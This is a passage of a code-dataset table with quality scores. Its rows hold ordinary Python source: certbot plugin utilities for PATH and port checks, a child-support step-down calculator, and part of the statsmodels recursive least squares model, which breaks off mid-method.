code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import logging
import os
import socket
import zope.component
from certbot import interfaces
from certbot import util
try:
import psutil
USE_PSUTIL = True
except ImportError:
USE_PSUTIL = False
logger = logging.getLogger(__name__)
RENEWER_EXTRA_MSG = (
" For automated renewal, you may want to use a script that stops"
" and starts your webserver. You can find an example at"
" https://certbot.eff.org/docs/using.html#renewal ."
" Alternatively you can use the webroot plugin to renew without"
" needing to stop and start your webserver.")
def path_surgery(restart_cmd):
    """Attempt to perform PATH surgery to find restart_cmd

    Mitigates https://github.com/certbot/certbot/issues/1833

    :param str restart_cmd: the command that is being searched for in the PATH

    :returns: True if the operation succeeded, False otherwise
    """
    dirs = ("/usr/sbin", "/usr/local/bin", "/usr/local/sbin")
    path = os.environ["PATH"]
    # Compare against the individual PATH entries rather than doing a raw
    # substring test: "/usr/sbin" is a substring of "/usr/local/sbin", so a
    # substring check would wrongly conclude "/usr/sbin" is already present.
    current_entries = path.split(os.pathsep)
    added = [d for d in dirs if d not in current_entries]
    if added:
        path += os.pathsep + os.pathsep.join(added)
        logger.debug("Can't find %s, attempting PATH mitigation by adding %s",
                     restart_cmd, os.pathsep.join(added))
        os.environ["PATH"] = path
    if util.exe_exists(restart_cmd):
        return True
    else:
        expanded = " expanded" if added else ""
        logger.warning("Failed to find %s in%s PATH: %s", restart_cmd,
                       expanded, path)
        return False
def already_listening(port, renewer=False):
    """Check if a process is already listening on the port.

    If so, also tell the user via a display notification.

    .. warning::
        On some operating systems, this function can only usefully be
        run as root.

    :param int port: The TCP port in question.

    :returns: True or False.
    """
    # Prefer the psutil-based check when psutil could be imported;
    # otherwise fall back to a plain socket bind probe.
    if not USE_PSUTIL:
        logger.debug("Psutil not found, using simple socket check.")
        return already_listening_socket(port, renewer=renewer)
    return already_listening_psutil(port, renewer=renewer)
def already_listening_socket(port, renewer=False):
    """Simple socket based check to find out if port is already in use

    :param int port: The TCP port in question.

    :returns: True or False
    """
    in_use = False
    try:
        probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
    except socket.error:
        # Could not even create a probe socket; report the port as free,
        # matching the original best-effort behavior.
        return False
    try:
        try:
            probe.bind(("", port))
        except socket.error:
            # Bind failed: something else already owns the port.
            in_use = True
            extra = RENEWER_EXTRA_MSG if renewer else ""
            display = zope.component.getUtility(interfaces.IDisplay)
            display.notification(
                "Port {0} is already in use by another process. This will "
                "prevent us from binding to that port. Please stop the "
                "process that is populating the port in question and try "
                "again. {1}".format(port, extra), height=13)
    finally:
        try:
            probe.close()
        except socket.error:
            pass
    return in_use
def already_listening_psutil(port, renewer=False):
    """Psutil variant of the open port check

    Scans ``psutil.net_connections()`` for a LISTEN-state TCP socket bound
    to ``port`` and, when one with an identifiable owner is found, notifies
    the user via the registered ``IDisplay`` utility.

    :param int port: The TCP port in question.
    :param bool renewer: If True, append renewal-specific advice
        (``RENEWER_EXTRA_MSG``) to the user notification.

    :returns: True or False.
    """
    try:
        net_connections = psutil.net_connections()
    except psutil.AccessDenied as error:
        logger.info("Access denied when trying to list network "
                    "connections: %s. Are you root?", error)
        # this function is just a pre-check that often causes false
        # positives and problems in testing (c.f. #680 on Mac, #255
        # generally); we will fail later in bind() anyway
        return False
    # PIDs of listening TCP sockets bound to the requested port
    # (laddr is an (address, port) tuple).
    listeners = [conn.pid for conn in net_connections
                 if conn.status == 'LISTEN' and
                 conn.type == socket.SOCK_STREAM and
                 conn.laddr[1] == port]
    try:
        if listeners and listeners[0] is not None:
            # conn.pid may be None if the current process doesn't have
            # permission to identify the listening process!  Additionally,
            # listeners may have more than one element if separate
            # sockets have bound the same port on separate interfaces.
            # We currently only have UI to notify the user about one
            # of them at a time.
            pid = listeners[0]
            name = psutil.Process(pid).name()
            display = zope.component.getUtility(interfaces.IDisplay)
            extra = ""
            if renewer:
                extra = RENEWER_EXTRA_MSG
            display.notification(
                "The program {0} (process ID {1}) is already listening "
                "on TCP port {2}. This will prevent us from binding to "
                "that port. Please stop the {0} program temporarily "
                "and then try again.{3}".format(name, pid, port, extra),
                height=13)
            return True
    except (psutil.NoSuchProcess, psutil.AccessDenied):
        # Perhaps the result of a race where the process could have
        # exited or relinquished the port (NoSuchProcess), or the result
        # of an OS policy where we're not allowed to look up the process
        # name (AccessDenied).
        pass
return False | certbot/plugins/util.py | import logging
import os
import socket
import zope.component
from certbot import interfaces
from certbot import util
try:
import psutil
USE_PSUTIL = True
except ImportError:
USE_PSUTIL = False
logger = logging.getLogger(__name__)
RENEWER_EXTRA_MSG = (
" For automated renewal, you may want to use a script that stops"
" and starts your webserver. You can find an example at"
" https://certbot.eff.org/docs/using.html#renewal ."
" Alternatively you can use the webroot plugin to renew without"
" needing to stop and start your webserver.")
def path_surgery(restart_cmd):
"""Attempt to perform PATH surgery to find restart_cmd
Mitigates https://github.com/certbot/certbot/issues/1833
:param str restart_cmd: the command that is being searched for in the PATH
:returns: True if the operation succeeded, False otherwise
"""
dirs = ("/usr/sbin", "/usr/local/bin", "/usr/local/sbin")
path = os.environ["PATH"]
added = []
for d in dirs:
if d not in path:
path += os.pathsep + d
added.append(d)
if any(added):
logger.debug("Can't find %s, attempting PATH mitigation by adding %s",
restart_cmd, os.pathsep.join(added))
os.environ["PATH"] = path
if util.exe_exists(restart_cmd):
return True
else:
expanded = " expanded" if any(added) else ""
logger.warning("Failed to find %s in%s PATH: %s", restart_cmd,
expanded, path)
return False
def already_listening(port, renewer=False):
"""Check if a process is already listening on the port.
If so, also tell the user via a display notification.
.. warning::
On some operating systems, this function can only usefully be
run as root.
:param int port: The TCP port in question.
:returns: True or False.
"""
if USE_PSUTIL:
return already_listening_psutil(port, renewer=renewer)
else:
logger.debug("Psutil not found, using simple socket check.")
return already_listening_socket(port, renewer=renewer)
def already_listening_socket(port, renewer=False):
"""Simple socket based check to find out if port is already in use
:param int port: The TCP port in question.
:returns: True or False
"""
try:
testsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
try:
testsocket.bind(("", port))
except socket.error:
display = zope.component.getUtility(interfaces.IDisplay)
extra = ""
if renewer:
extra = RENEWER_EXTRA_MSG
display.notification(
"Port {0} is already in use by another process. This will "
"prevent us from binding to that port. Please stop the "
"process that is populating the port in question and try "
"again. {1}".format(port, extra), height=13)
return True
finally:
testsocket.close()
except socket.error:
pass
return False
def already_listening_psutil(port, renewer=False):
"""Psutil variant of the open port check
:param int port: The TCP port in question.
:returns: True or False.
"""
try:
net_connections = psutil.net_connections()
except psutil.AccessDenied as error:
logger.info("Access denied when trying to list network "
"connections: %s. Are you root?", error)
# this function is just a pre-check that often causes false
# positives and problems in testing (c.f. #680 on Mac, #255
# generally); we will fail later in bind() anyway
return False
listeners = [conn.pid for conn in net_connections
if conn.status == 'LISTEN' and
conn.type == socket.SOCK_STREAM and
conn.laddr[1] == port]
try:
if listeners and listeners[0] is not None:
# conn.pid may be None if the current process doesn't have
# permission to identify the listening process! Additionally,
# listeners may have more than one element if separate
# sockets have bound the same port on separate interfaces.
# We currently only have UI to notify the user about one
# of them at a time.
pid = listeners[0]
name = psutil.Process(pid).name()
display = zope.component.getUtility(interfaces.IDisplay)
extra = ""
if renewer:
extra = RENEWER_EXTRA_MSG
display.notification(
"The program {0} (process ID {1}) is already listening "
"on TCP port {2}. This will prevent us from binding to "
"that port. Please stop the {0} program temporarily "
"and then try again.{3}".format(name, pid, port, extra),
height=13)
return True
except (psutil.NoSuchProcess, psutil.AccessDenied):
# Perhaps the result of a race where the process could have
# exited or relinquished the port (NoSuchProcess), or the result
# of an OS policy where we're not allowed to look up the process
# name (AccessDenied).
pass
return False | 0.480722 | 0.146087 |
from datetime import datetime
from dateutil.relativedelta import relativedelta
from decimal import Decimal
STEPDOWN_MONTH = 6 # Assume children graduate high shcool in June
STEPDOWN_DAY = 30 # Last day before child support reduces is last day of month
def stepdown(children: list, initial_payment_amount: Decimal, num_children_not_before_court: int = 0) -> list:
    """
    Create a list of stepdown dates from a list of children.

    Each child in the children list must contain the following keys:

    * name (str) - The child's name
    * dob (datetime) - The child's date of birth

    The child can have other keys and they'll be returned to the caller.

    Each step-down date in the returned list will be a dict with these keys:

    * child (dict) - The dict provided by the caller for this child
    * last_payment_date (datetime) - The date after which child support steps down

    Args:
        children (list): List of child dicts
        initial_payment_amount (Decimal): Amount of initial payment
        num_children_not_before_court (int): Number of children obligor is legally obligated
            to support who are not involved in this case.
    Returns:
        (list): List of dicts, one for each step down date. Values will be sorted
            by the stepdown_date attribute (ascending).
    Raises:
        ValueError: If a child is not properly constructed, i.e. missing
            a required key or having the wrong datatype as the value.
    Example:
        children = [
            {'name': "Tom", 'dob': datetime(2015, 1, 29)},
            {'name': "Cindy", 'dob': datetime(2017, 5, 29)},
            {'name': "Ava", 'dob': datetime(2005, 9, 4)}
        ]
        print(stepdown(children, Decimal(1000)))
    """
    stepdown_dates = []
    initial_child_count = len(children)
    # Process oldest-first so the remaining-child count decreases as each
    # child ages out.  enumerate() replaces the original pop(0) loop, which
    # was O(n^2) and mutated the working list.
    sorted_children = sorted(children, key=lambda k: k['dob'])
    for num_processed, child in enumerate(sorted_children, start=1):
        __verify_child(child)
        turns_18 = child['dob'] + relativedelta(years=+18)
        # Support runs through the STEPDOWN_MONTH after the 18th birthday;
        # a birthday later in the year pushes the step-down to next year.
        # (Uses the module constant instead of the previously hard-coded 6.)
        if turns_18.month <= STEPDOWN_MONTH:
            stepdown_year = turns_18.year
        else:
            stepdown_year = turns_18.year + 1
        stepdown_date = datetime(stepdown_year, STEPDOWN_MONTH, STEPDOWN_DAY)
        remaining_child_count = initial_child_count - num_processed
        stepdown_dates.append({
            'child': child,
            'last_payment_date': stepdown_date,
            'payment_amount': __stepdown_amount(initial_payment_amount, initial_child_count, remaining_child_count, num_children_not_before_court)
        })
    return sorted(stepdown_dates, key=lambda k: k['last_payment_date'])
__REQUIRED_KEYS = [('name', str), ('dob', datetime)]
def __verify_child(child: dict) -> bool:
    """Validate that *child* carries every required key with the right type.

    Args:
        child (dict): Candidate child record; must satisfy __REQUIRED_KEYS.
    Returns:
        (bool): True when the child is valid.
    Raises:
        ValueError: If a required key is missing or its value has the
            wrong datatype.
    """
    for key_name, data_type in __REQUIRED_KEYS:
        # raise is a statement, not a function; drop the wrapping parens.
        if key_name not in child:
            raise ValueError(f"Invalid child. Missing key {key_name}")
        if not isinstance(child[key_name], data_type):
            # Fixed stray doubled quote after the key name in the message.
            raise ValueError(
                f"Invalid child. Value for '{key_name}' must be {str(data_type)}")
    return True
__CHILD_SUPPORT_FACTORS = [
[.2000, .2500, .3000, .3500, .4000, .4000, .4000],
[.1750, .2250, .2738, .3220, .3733, .3771, .3800],
[.1600, .2063, .2520, .3033, .3543, .3600, .3644],
[.1475, .1900, .2400, .2900, .3400, .3467, .3520],
[.1360, .1833, .2314, .2800, .3289, .3360, .3418],
[.1333, .1786, .2250, .2722, .3200, .3273, .3333],
[.1314, .1750, .2200, .2660, .3127, .3200, .3262],
[.1300, .1722, .2160, .2609, .3067, .3138, .3200]
]
def __stepdown_amount(initial_payment_amount: Decimal, initial_child_count: int, remaining_child_count: int, num_children_not_before_court: int) -> Decimal:
    """Compute the payment amount that applies after a step-down.

    Back-solves the obligor's net resources from the initial payment and
    the factor table, then applies the factor for the remaining children.

    Args:
        initial_payment_amount (Decimal): Amount of the initial payment.
        initial_child_count (int): Number of children at the outset.
        remaining_child_count (int): Children still before the court.
        num_children_not_before_court (int): Other supported children
            (selects the table row).
    Returns:
        (Decimal): New payment amount, rounded to 2 decimal places.
    """
    # Clamp with >= : the original `>` comparisons indexed one past the end
    # (IndexError) when the count equaled the table size exactly.
    if num_children_not_before_court >= len(__CHILD_SUPPORT_FACTORS):
        row = len(__CHILD_SUPPORT_FACTORS) - 1
    else:
        row = num_children_not_before_court
    factors = __CHILD_SUPPORT_FACTORS[row]
    if remaining_child_count >= len(factors):
        new_factor = factors[-1]
    else:
        # NOTE(review): indexes by count here but by count-1 for the initial
        # factor below — confirm this asymmetry is intended.
        new_factor = factors[remaining_child_count]
    if initial_child_count > len(factors):
        initial_factor = factors[-1]
    else:
        initial_factor = factors[initial_child_count-1]
    net_resources = initial_payment_amount / Decimal(initial_factor)
    new_amount = Decimal(net_resources * Decimal(new_factor))
    return round(new_amount, 2)
"""
Example usage.
"""
def main():
children = [
{'name': "Tom", 'dob': datetime(2015, 1, 29)},
{'name': "Cindy", 'dob': datetime(2017, 5, 29)},
{'name': "Ava", 'dob': datetime(2005, 9, 4)}
]
print(stepdown(children, Decimal(1000)))
if __name__ == '__main__':
main() | csutils/stepdown.py | from datetime import datetime
from dateutil.relativedelta import relativedelta
from decimal import Decimal
STEPDOWN_MONTH = 6 # Assume children graduate high shcool in June
STEPDOWN_DAY = 30 # Last day before child support reduces is last day of month
def stepdown(children: list, initial_payment_amount: Decimal, num_children_not_before_court: int = 0) -> list:
"""
Create a list of stepdown dates from a list of children.
Each child in the children list must contain the following keys:
* name (str) - The child's name
* dob (datetime) - The child's date of birth
The child can have other keys and they'll be returned to the caller.
Each step-down date in the returned list will be a dict with these keys:
* child (dict) - The dict provided by the caller re this this child
* last_payment_date (datetime) - The date after which child support steps down
Args:
children (list): List of child dicts
initial_payment_amount (Decimal): Amount of initial payment
num_children_not_before_court (int): Number of children obligor is legally obligated
to support who are not involved in this case.
Returns:
(list): List of dicts, one for each step down date. Values will be sorted
by the stepdown_date attribute (ascending).
Raises:
ValueError: If a child is not properly constructed, i.e. missing
a required key or having the wrong datatype as the value.
Example:
children = [
{'name': "Tom", 'dob': datetime(2015, 1, 29)},
{'name': "Cindy", 'dob': datetime(2017, 5, 29)},
{'name': "Ava", 'dob': datetime(2005, 9, 4)}
]
print(stepdown(children, Decimal(1000)))
"""
stepdown_dates = []
initial_child_count = len(children)
sorted_children = sorted(children, key=lambda k: k['dob'])
while sorted_children:
child = sorted_children.pop(0)
__verify_child(child)
turns_18 = child['dob'] + relativedelta(years=+18)
if turns_18.month <= 6:
stepdown_year = turns_18.year
else:
stepdown_year = turns_18.year + 1
stepdown_date = datetime(stepdown_year, STEPDOWN_MONTH, STEPDOWN_DAY)
stepdown_dates.append({
'child': child,
'last_payment_date': stepdown_date,
'payment_amount': __stepdown_amount(initial_payment_amount, initial_child_count, len(sorted_children), num_children_not_before_court)
})
return sorted(stepdown_dates, key=lambda k: k['last_payment_date'])
__REQUIRED_KEYS = [('name', str), ('dob', datetime)]
def __verify_child(child: dict) -> bool:
for key_name, data_type in __REQUIRED_KEYS:
if key_name not in child:
raise(ValueError(f"Invalid child. Missing key {key_name}"))
if not isinstance(child[key_name], data_type):
raise(ValueError(f"Invalid child. Value for '{key_name}'' must be {str(data_type)}"))
return True
__CHILD_SUPPORT_FACTORS = [
[.2000, .2500, .3000, .3500, .4000, .4000, .4000],
[.1750, .2250, .2738, .3220, .3733, .3771, .3800],
[.1600, .2063, .2520, .3033, .3543, .3600, .3644],
[.1475, .1900, .2400, .2900, .3400, .3467, .3520],
[.1360, .1833, .2314, .2800, .3289, .3360, .3418],
[.1333, .1786, .2250, .2722, .3200, .3273, .3333],
[.1314, .1750, .2200, .2660, .3127, .3200, .3262],
[.1300, .1722, .2160, .2609, .3067, .3138, .3200]
]
def __stepdown_amount(initial_payment_amount: Decimal, initial_child_count: int, remaining_child_count: int, num_children_not_before_court: int) -> Decimal:
if num_children_not_before_court > len(__CHILD_SUPPORT_FACTORS):
row = len(__CHILD_SUPPORT_FACTORS) - 1
else:
row = num_children_not_before_court
factors = __CHILD_SUPPORT_FACTORS[row]
if remaining_child_count > len(factors):
new_factor = factors[-1]
else:
new_factor = factors[remaining_child_count]
if initial_child_count > len(factors):
initial_factor = factors[-1]
else:
initial_factor = factors[initial_child_count-1]
net_resources = initial_payment_amount / Decimal(initial_factor)
new_amount = Decimal(net_resources * Decimal(new_factor))
return round(new_amount, 2)
"""
Example usage.
"""
def main():
children = [
{'name': "Tom", 'dob': datetime(2015, 1, 29)},
{'name': "Cindy", 'dob': datetime(2017, 5, 29)},
{'name': "Ava", 'dob': datetime(2005, 9, 4)}
]
print(stepdown(children, Decimal(1000)))
if __name__ == '__main__':
main() | 0.810929 | 0.396243 |
from __future__ import division, absolute_import, print_function
try: unicode
except NameError: unicode = str
from warnings import warn
from statsmodels.compat.collections import OrderedDict
import numpy as np
import pandas as pd
from statsmodels.regression.linear_model import OLS
from statsmodels.tools.data import _is_using_pandas
from statsmodels.tsa.statespace.mlemodel import (
MLEModel, MLEResults, MLEResultsWrapper, PredictionResults,
PredictionResultsWrapper)
from statsmodels.tools.tools import Bunch
from statsmodels.tools.decorators import cache_readonly, resettable_cache
import statsmodels.base.wrapper as wrap
# Columns are alpha = 0.1, 0.05, 0.025, 0.01, 0.005
_cusum_squares_scalars = np.array([
[1.0729830, 1.2238734, 1.3581015, 1.5174271, 1.6276236],
[-0.6698868, -0.6700069, -0.6701218, -0.6702672, -0.6703724],
[-0.5816458, -0.7351697, -0.8858694, -1.0847745, -1.2365861]
])
class RecursiveLS(MLEModel):
    r"""
    Recursive least squares

    Parameters
    ----------
    endog : array_like
        The observed time-series process :math:`y`
    exog : array_like
        Array of exogenous regressors, shaped nobs x k.
    constraints : array-like, str, or tuple
        - array : An r x k array where r is the number of restrictions to
          test and k is the number of regressors. It is assumed that the
          linear combination is equal to zero.
        - str : The full hypotheses to test can be given as a string.
          See the examples.
        - tuple : A tuple of arrays in the form (R, q), ``q`` can be
          either a scalar or a length p row vector.

    Notes
    -----
    Recursive least squares (RLS) corresponds to expanding window ordinary
    least squares (OLS).
    This model applies the Kalman filter to compute recursive estimates of the
    coefficients and recursive residuals.

    References
    ----------
    .. [*] <NAME>, and <NAME>. 2012.
       Time Series Analysis by State Space Methods: Second Edition.
       Oxford University Press.
    """
    def __init__(self, endog, exog, constraints=None, **kwargs):
        # Standardize data
        if not _is_using_pandas(endog, None):
            endog = np.asanyarray(endog)
        exog_is_using_pandas = _is_using_pandas(exog, None)
        if not exog_is_using_pandas:
            exog = np.asarray(exog)
        # Make sure we have 2-dimensional array
        if exog.ndim == 1:
            if not exog_is_using_pandas:
                exog = exog[:, None]
            else:
                exog = pd.DataFrame(exog)
        self.k_exog = exog.shape[1]
        # Handle constraints
        self.k_constraints = 0
        self._r_matrix = self._q_matrix = None
        if constraints is not None:
            from patsy import DesignInfo
            from statsmodels.base.data import handle_data
            data = handle_data(endog, exog, **kwargs)
            names = data.param_names
            LC = DesignInfo(names).linear_constraint(constraints)
            self._r_matrix, self._q_matrix = LC.coefs, LC.constants
            self.k_constraints = self._r_matrix.shape[0]
            # Constraints are imposed by appending one "fake" observed
            # series per restriction, identically equal to q; these extra
            # columns enter the filter but are hidden from results
            # (k_endog is reset to 1 at the end of __init__).
            endog = np.c_[endog, np.zeros((len(endog), len(self._r_matrix)))]
            endog[:, 1:] = self._q_matrix
        # Handle coefficient initialization
        kwargs.setdefault('initialization', 'diffuse')
        # Initialize the state space representation
        super(RecursiveLS, self).__init__(
            endog, k_states=self.k_exog, exog=exog, **kwargs)
        # Use univariate filtering by default
        self.ssm.filter_univariate = True
        # Concentrate the scale out of the likelihood function
        self.ssm.filter_concentrated = True
        # Setup the state space representation: time-varying design holds
        # the regressors; the state (the coefficients) follows an identity
        # transition (i.e. constant coefficients).
        self['design'] = np.zeros((self.k_endog, self.k_states, self.nobs))
        self['design', 0] = self.exog[:, :, None].T
        if self._r_matrix is not None:
            self['design', 1:, :] = self._r_matrix[:, :, None]
        self['transition'] = np.eye(self.k_states)
        # Notice that the filter output does not depend on the measurement
        # variance, so we set it here to 1
        self['obs_cov', 0, 0] = 1.
        # NOTE(review): duplicate of the identity-transition assignment a
        # few lines above; harmless (idempotent) but could be removed.
        self['transition'] = np.eye(self.k_states)
        # Linear constraints are technically imposed by adding "fake" endog
        # variables that are used during filtering, but for all model- and
        # results-based purposes we want k_endog = 1.
        if self._r_matrix is not None:
            self.k_endog = 1

    @classmethod
    def from_formula(cls, formula, data, subset=None, constraints=None):
        # Deliberately skips MLEModel's from_formula (hence super(MLEModel,
        # cls)) and forwards constraints through to __init__.
        return super(MLEModel, cls).from_formula(formula, data, subset,
                                                 constraints=constraints)

    def fit(self):
        """
        Fits the model by application of the Kalman filter

        Returns
        -------
        RecursiveLSResults
        """
        # First smooth to obtain the concentrated scale, then re-smooth
        # with that scale fixed so the results carry the right covariances.
        smoother_results = self.smooth(return_ssm=True)
        with self.ssm.fixed_scale(smoother_results.scale):
            res = self.smooth()
        return res

    def filter(self, return_ssm=False, **kwargs):
        """Apply the Kalman filter.

        Parameters
        ----------
        return_ssm : bool, optional
            If True, return the raw state space results object instead of
            wrapping it in a RecursiveLSResults.
        """
        # Get the state space output (the model has no free parameters,
        # hence the empty params list).
        result = super(RecursiveLS, self).filter([], transformed=True,
                                                 cov_type='none',
                                                 return_ssm=True, **kwargs)
        # Wrap in a results object
        if not return_ssm:
            # The "parameters" are the final filtered state (the full-sample
            # coefficient estimates).
            params = result.filtered_state[:, -1]
            cov_kwds = {
                'custom_cov_type': 'nonrobust',
                'custom_cov_params': result.filtered_state_cov[:, :, -1],
                'custom_description': ('Parameters and covariance matrix'
                                       ' estimates are RLS estimates'
                                       ' conditional on the entire sample.')
            }
            result = RecursiveLSResultsWrapper(
                RecursiveLSResults(self, params, result, cov_type='custom',
                                   cov_kwds=cov_kwds)
            )
        return result

    def smooth(self, return_ssm=False, **kwargs):
        """Apply the Kalman smoother.

        Parameters
        ----------
        return_ssm : bool, optional
            If True, return the raw state space results object instead of
            wrapping it in a RecursiveLSResults.
        """
        # Get the state space output (no free parameters; see filter()).
        result = super(RecursiveLS, self).smooth([], transformed=True,
                                                 cov_type='none',
                                                 return_ssm=True, **kwargs)
        # Wrap in a results object
        if not return_ssm:
            params = result.filtered_state[:, -1]
            cov_kwds = {
                'custom_cov_type': 'nonrobust',
                'custom_cov_params': result.filtered_state_cov[:, :, -1],
                'custom_description': ('Parameters and covariance matrix'
                                       ' estimates are RLS estimates'
                                       ' conditional on the entire sample.')
            }
            result = RecursiveLSResultsWrapper(
                RecursiveLSResults(self, params, result, cov_type='custom',
                                   cov_kwds=cov_kwds)
            )
        return result

    @property
    def param_names(self):
        # Coefficient names are just the regressor names.
        return self.exog_names

    @property
    def start_params(self):
        # Only parameter is the measurement disturbance standard deviation
        return np.zeros(0)

    def update(self, params, **kwargs):
        """
        Update the parameters of the model

        Updates the representation matrices to fill in the new parameter
        values.

        Parameters
        ----------
        params : array_like
            Array of new parameters.
        transformed : boolean, optional
            Whether or not `params` is already transformed. If set to False,
            `transform_params` is called. Default is True..

        Returns
        -------
        params : array_like
            Array of parameters.
        """
        # Intentionally a no-op: the model has no free parameters, so the
        # representation matrices never change.
        pass
class RecursiveLSResults(MLEResults):
"""
Class to hold results from fitting a recursive least squares model.
Parameters
----------
model : RecursiveLS instance
The fitted model instance
Attributes
----------
specification : dictionary
Dictionary including all attributes from the recursive least squares
model instance.
See Also
--------
statsmodels.tsa.statespace.kalman_filter.FilterResults
statsmodels.tsa.statespace.mlemodel.MLEResults
"""
def __init__(self, model, params, filter_results, cov_type='opg',
**kwargs):
super(RecursiveLSResults, self).__init__(
model, params, filter_results, cov_type, **kwargs)
# Since we are overriding params with things that aren't MLE params,
# need to adjust df's
q = max(self.loglikelihood_burn, self.k_diffuse_states)
self.df_model = q - self.model.k_constraints
self.df_resid = self.nobs_effective - self.df_model
# Save _init_kwds
self._init_kwds = self.model._get_init_kwds()
# Save the model specification
self.specification = Bunch(**{
'k_exog': self.model.k_exog,
'k_constraints': self.model.k_constraints})
@property
def recursive_coefficients(self):
"""
Estimates of regression coefficients, recursively estimated
Returns
-------
out: Bunch
Has the following attributes:
- `filtered`: a time series array with the filtered estimate of
the component
- `filtered_cov`: a time series array with the filtered estimate of
the variance/covariance of the component
- `smoothed`: a time series array with the smoothed estimate of
the component
- `smoothed_cov`: a time series array with the smoothed estimate of
the variance/covariance of the component
- `offset`: an integer giving the offset in the state vector where
this component begins
"""
out = None
spec = self.specification
start = offset = 0
end = offset + spec.k_exog
out = Bunch(
filtered=self.filtered_state[start:end],
filtered_cov=self.filtered_state_cov[start:end, start:end],
smoothed=None, smoothed_cov=None,
offset=offset
)
if self.smoothed_state is not None:
out.smoothed = self.smoothed_state[start:end]
if self.smoothed_state_cov is not None:
out.smoothed_cov = (
self.smoothed_state_cov[start:end, start:end])
return out
@cache_readonly
def resid_recursive(self):
r"""
Recursive residuals
Returns
-------
resid_recursive : array_like
An array of length `nobs` holding the recursive
residuals.
Notes
-----
These quantities are defined in, for example, Harvey (1989)
section 5.4. In fact, there he defines the standardized innovations in
equation 5.4.1, but in his version they have non-unit variance, whereas
the standardized forecast errors computed by the Kalman filter here
assume unit variance. To convert to Harvey's definition, we need to
multiply by the standard deviation.
Harvey notes that in smaller samples, "although the second moment
of the :math:`\tilde \sigma_*^{-1} \tilde v_t`'s is unity, the
variance is not necessarily equal to unity as the mean need not be
equal to zero", and he defines an alternative version (which are
not provided here).
"""
return (self.filter_results.standardized_forecasts_error[0] *
self.scale**0.5)
@cache_readonly
def cusum(self):
r"""
Cumulative sum of standardized recursive residuals statistics
Returns
-------
cusum : array_like
An array of length `nobs - k_exog` holding the
CUSUM statistics.
Notes
-----
The CUSUM statistic takes the form:
.. math::
W_t = \frac{1}{\hat \sigma} \sum_{j=k+1}^t w_j
where :math:`w_j` is the recursive residual at time :math:`j` and
:math:`\hat \sigma` is the estimate of the standard deviation
from the full sample.
Excludes the first `k_exog` datapoints.
Due to differences in the way :math:`\hat \sigma` is calculated, the
output of this function differs slightly from the output in the
R package strucchange and the Stata contributed .ado file cusum6. The
calculation in this package is consistent with the description of
Brown et al. (1975)
References
----------
.. [*] <NAME>., <NAME>, and <NAME>. 1975.
"Techniques for Testing the Constancy of
Regression Relationships over Time."
Journal of the Royal Statistical Society.
Series B (Methodological) 37 (2): 149-92.
"""
d = max(self.nobs_diffuse, self.loglikelihood_burn)
return (np.cumsum(self.resid_recursive[d:]) /
np.std(self.resid_recursive[d:], ddof=1))
@cache_readonly
def cusum_squares(self):
r"""
Cumulative sum of squares of standardized recursive residuals
statistics
Returns
-------
cusum_squares : array_like
An array of length `nobs - k_exog` holding the
CUSUM of squares statistics.
Notes
-----
The CUSUM of squares statistic takes the form:
.. math::
s_t = \left ( \sum_{j=k+1}^t w_j^2 \right ) \Bigg /
\left ( \sum_{j=k+1}^T w_j^2 \right )
where :math:`w_j` is the recursive residual at time :math:`j`.
Excludes the first `k_exog` datapoints.
References
----------
.. [*] <NAME>., <NAME>, and <NAME>. 1975.
"Techniques for Testing the Constancy of
Regression Relationships over Time."
Journal of the Royal Statistical Society.
Series B (Methodological) 37 (2): 149-92.
"""
d = max(self.nobs_diffuse, self.loglikelihood_burn)
numer = np.cumsum(self.resid_recursive[d:]**2)
denom = numer[-1]
return numer / denom
@cache_readonly
def llf_recursive_obs(self):
"""
(float) Loglikelihood at observation, computed from recursive residuals
"""
from scipy.stats import norm
return np.log(norm.pdf(self.resid_recursive, loc=0,
scale=self.scale**0.5))
@cache_readonly
def llf_recursive(self):
"""
(float) Loglikelihood defined by recursive residuals, equivalent to OLS
"""
return np.sum(self.llf_recursive_obs)
@cache_readonly
def ssr(self):
    """(float) Sum of squared residuals, excluding diffuse/burned obs."""
    d = max(self.nobs_diffuse, self.loglikelihood_burn)
    return (self.nobs - d) * self.filter_results.obs_cov[0, 0, 0]
@cache_readonly
def centered_tss(self):
    """(float) Total sum of squares around the sample mean of endog."""
    return np.sum((self.filter_results.endog[0] -
                   np.mean(self.filter_results.endog))**2)
@cache_readonly
def uncentered_tss(self):
    """(float) Total sum of squares of endog, not demeaned."""
    return np.sum((self.filter_results.endog[0])**2)
@cache_readonly
def ess(self):
    """(float) Explained sum of squares.

    Uses the centered TSS when the model has a constant, the uncentered
    TSS otherwise (mirrors OLS conventions).
    """
    if self.k_constant:
        return self.centered_tss - self.ssr
    else:
        return self.uncentered_tss - self.ssr
@cache_readonly
def rsquared(self):
    """(float) R-squared; centered iff the model includes a constant."""
    if self.k_constant:
        return 1 - self.ssr / self.centered_tss
    else:
        return 1 - self.ssr / self.uncentered_tss
@cache_readonly
def mse_model(self):
    """(float) Mean squared error of the model (ESS / model df)."""
    return self.ess / self.df_model
@cache_readonly
def mse_resid(self):
    """(float) Mean squared error of the residuals (SSR / residual df)."""
    return self.ssr / self.df_resid
@cache_readonly
def mse_total(self):
    """(float) Total mean squared error (TSS over total df)."""
    if self.k_constant:
        return self.centered_tss / (self.df_resid + self.df_model)
    else:
        return self.uncentered_tss / (self.df_resid + self.df_model)
def get_prediction(self, start=None, end=None, dynamic=False,
index=None, **kwargs):
# Note: need to override this, because we currently don't support
# dynamic prediction or forecasts when there are constraints.
if start is None:
start = self.model._index[0]
# Handle start, end, dynamic
start, end, out_of_sample, prediction_index = (
self.model._get_prediction_index(start, end, index))
# Handle `dynamic`
if isinstance(dynamic, (bytes, unicode)):
dynamic, _, _ = self.model._get_index_loc(dynamic)
if self.model._r_matrix is not None and (out_of_sample or dynamic):
raise NotImplementedError('Cannot yet perform out-of-sample or'
' dynamic prediction in models with'
' constraints.')
# Perform the prediction
# This is a (k_endog x npredictions) array; don't want to squeeze in
# case of npredictions = 1
prediction_results = self.filter_results.predict(
start, end + out_of_sample + 1, dynamic, **kwargs)
# Return a new mlemodel.PredictionResults object
return PredictionResultsWrapper(PredictionResults(
self, prediction_results, row_labels=prediction_index))
get_prediction.__doc__ = MLEResults.get_prediction.__doc__
def plot_recursive_coefficient(self, variables=0, alpha=0.05,
legend_loc='upper left', fig=None,
